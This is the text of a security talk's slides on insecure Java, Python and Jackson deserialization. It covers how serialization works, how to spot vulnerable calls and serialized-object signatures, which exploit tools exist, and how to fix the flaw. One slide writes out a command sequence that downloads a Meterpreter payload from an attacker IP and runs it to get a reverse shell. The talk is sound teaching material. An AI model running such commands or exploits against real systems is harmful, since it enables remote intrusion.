how to be an app serial killer...don't be scared!!! (or bored )-if you know nothing about this...
TRANSCRIPT
![Page 1: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/1.jpg)
How to be an App Serial KillerR E B E C C A D E C K
A V A L A R A
@ R A N G E R _ C H A
![Page 2: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/2.jpg)
DON'T BE SCARED!!! (or bored)
- If you know nothing about this topic…
-Hopefully you understand 25%
- If you know a little about the topic…
-50-75%
- If you are really solid in your knowledge of the topic…
-Learn one or two new things
2
![Page 3: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/3.jpg)
Objective
-Deserialization Background
-Normal Deserialization
-Finding Deserialization Issues
-Deserialization Exploitation
3
![Page 4: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/4.jpg)
Deserialization Background
https://me.me/i/confused-cat-meme-generator-imgflip-19c02328bba745a5b799c1b94446353d4
September 29, 2019
![Page 5: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/5.jpg)
Serialization from the beginning…
What is an object?
Collection of values that works as a single unit
5
![Page 6: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/6.jpg)
Serialization from the beginning…
Process of preparing objects for network transport
Also called marshalling
What does serialization look like?
6
Source: https://www.javaworld.com/article/2072752/the-java-serialization-algorithm-revealed.html
![Page 7: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/7.jpg)
Deserialization
Deserialization is the reverse of serialization
Usually from a readObject call (in Java)
Common in many languages
Force server to load an unexpected object
Often execute arbitrary code
7
![Page 8: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/8.jpg)
Transferring Data with Serialization
8
Server
Serializes
Client
Deserializes
Client
Serializes
Server
Deserializes
Server
Serializes
Writes Data to
Disk/Memcache
Server
Deserializes
![Page 9: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/9.jpg)
Malicious Objects
9
Source: https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/
![Page 10: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/10.jpg)
Deserialization Remediation
How do you fix it?Upgrade for…
Blacklisting???
Nooooo
Hard to write signatures
10https://sayingimages.com/cat-meme/
![Page 11: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/11.jpg)
Deserialization Remediation
Look-ahead DeserializationOverload resolveClass
Ensure that the object is of thecorrect class
JUST DON'T DO IT
Do something better like default JSON parsers
11http://takomatorch.com/index.php/2019/07/13/takoma-park-police-adopt-new-enforcement-tactic-based-on-cat-discipline/
![Page 12: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/12.jpg)
Finding Deserialization
September 28, 2019 12
![Page 13: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/13.jpg)
White Box
Talk to developers
Look for deserialization calls
Java – readObject
Python – Pickle
.NET – TypeNameHandling, JavaScriptTypeResolver
Jackson – enableDefaultTyping, setSerializationInclusion, readValue
13
![Page 14: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/14.jpg)
Black Box
Look for objects
Java – rO0, ACED0005, application/x-java-serialized-object
.NET – AAEAAAD/////, TypeObject, $type:
Python –
JSON – ["objtype",{"name": "value"}]
14
![Page 15: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/15.jpg)
Exploiting Deserialization
September 28, 2019 15
![Page 16: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/16.jpg)
Pickle Deserialization
https://blog.nelhage.com/2011/03/exploiting-pickle/
Look for deserialization calls
16
![Page 17: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/17.jpg)
Pickle Deserialization Exploit Class
Create a class that executes code when created
17
![Page 18: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/18.jpg)
Pickle Send Exploit
Send exploit to server
How depends on the app
18
![Page 19: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/19.jpg)
Deserialization in Java
Look for raw Java objects
Find a suitable gadget (object to run code when loaded)Must be an object the app understands
Ysoserial provides several gadgetshttps://github.com/frohoff/ysoserial
19
![Page 20: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/20.jpg)
Deserialization in Java
Vulnerable app https://github.com/hvqzao/java-deserialize-webapp
Includes Apache Commons Collection
Ysoserial exploit only runs one command
Reverse shell in three commandswget IP/meterpreterchmod +x meterpreter./meterpreter
20
![Page 21: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/21.jpg)
Deserialization in Java Example
21
![Page 22: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/22.jpg)
Deserialization in Java Example
22
![Page 23: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/23.jpg)
Deserialization in Java Example
23
![Page 24: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/24.jpg)
Deserialization in Java Example
24
![Page 25: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/25.jpg)
No Java Objects?
Safe without Java objects?
Moar gadgetshttps://github.com/mbechler/marshalsec
Same idea, different formatJSON, XML
25
![Page 26: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/26.jpg)
Jackson Deserialization
26
![Page 27: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/27.jpg)
Jackson Deserialization
27
![Page 28: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/28.jpg)
Jackson Deserialization
28
![Page 29: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/29.jpg)
Jackson Deserialization
29
![Page 30: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/30.jpg)
Summary
• Ysoserial and marshalsec for exploit gadgets
• Find by looking for common serialized object magic numbers or deserialization routines in code
• Often “Fix” Deserialization by blacklisting classes (need patch)
• Better off rewriting the data serialization method
• Use safer (less full-featured) libraries
30
![Page 31: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/31.jpg)
References
Look-ahead Java Deserialization
https://www.ibm.com/developerworks/java/library/se-lookahead/index.html
31
![Page 32: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/32.jpg)
References
Deserialization Resources
https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md
Marshalling Pickles
http://frohoff.github.io/appseccali-marshalling-pickles/
ysoserial
https://github.com/frohoff/ysoserial
Deserialization – Different marshallers
https://github.com/mbechler/marshalsec
32
![Page 33: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/33.jpg)
References
Pickle Deserialization
https://blog.nelhage.com/2011/03/exploiting-pickle/
Java Deserialization app
https://github.com/hvqzao/java-deserialize-webapp
Jackson Deserialization
https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/
33
![Page 34: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/34.jpg)
Questions?
34
![Page 35: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/35.jpg)
www.directdefense.comwww.directdefense.com